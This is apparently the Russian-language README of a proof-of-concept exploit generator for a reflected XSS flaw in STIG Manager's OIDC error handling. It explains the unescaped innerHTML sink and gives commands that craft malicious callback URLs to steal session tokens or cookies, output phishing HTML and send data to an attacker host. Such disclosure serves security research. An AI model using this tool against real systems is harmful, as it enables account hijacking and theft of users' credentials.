
Генератор эксплоитов доказательства концепции для отражённого XSS в аутентификации OIDC STIG Manager, позволяющий красть токены сессии через поддельные callback-URL и вывод фишингового HTML.
Концептуальное доказательство уязвимости отражённого межсайтового скриптинга (XSS) в STIG Manager версий 1.5.10 – 1.6.7.
Уязвимость отражённого XSS существует в коде обработки ошибок аутентификации OIDC веб-приложения STIG Manager. Параметры запроса error и error_description, возвращаемые провайдером OIDC, записываются напрямую в DOM через innerHTML без экранирования HTML. Злоумышленник, который может создать вредоносный URL и убедить пользователя перейти по нему, может выполнить произвольный JavaScript в контексте приложения.
Уязвимость наиболее серьезна, когда у целевого пользователя есть активная сессия STIG Manager в другой вкладке браузера — внедренный код может взаимодействовать с SharedWorker, управляющим токеном доступа, что позволяет отправлять аутентифицированные API-запросы от имени жертвы.
# Генерация вредоносного callback URL (режим кражи токена SharedWorker)
python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m sharedworker
# Генерация простой полезной нагрузки для кражи cookie
python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m simple
# Вывод в виде фишингового HTML
python3 cve-2026-41200-poc.py --format html
# Пользовательские API и хосты для эксфильтрации
python3 cve-2026-41200-poc.py \
-c https://stig-manager.example.com/auth/callback \
-a https://stig-manager.example.com \
-e https://attacker.example.com
Этот инструмент предоставляется только для образовательных целей и авторизованных исследований безопасности.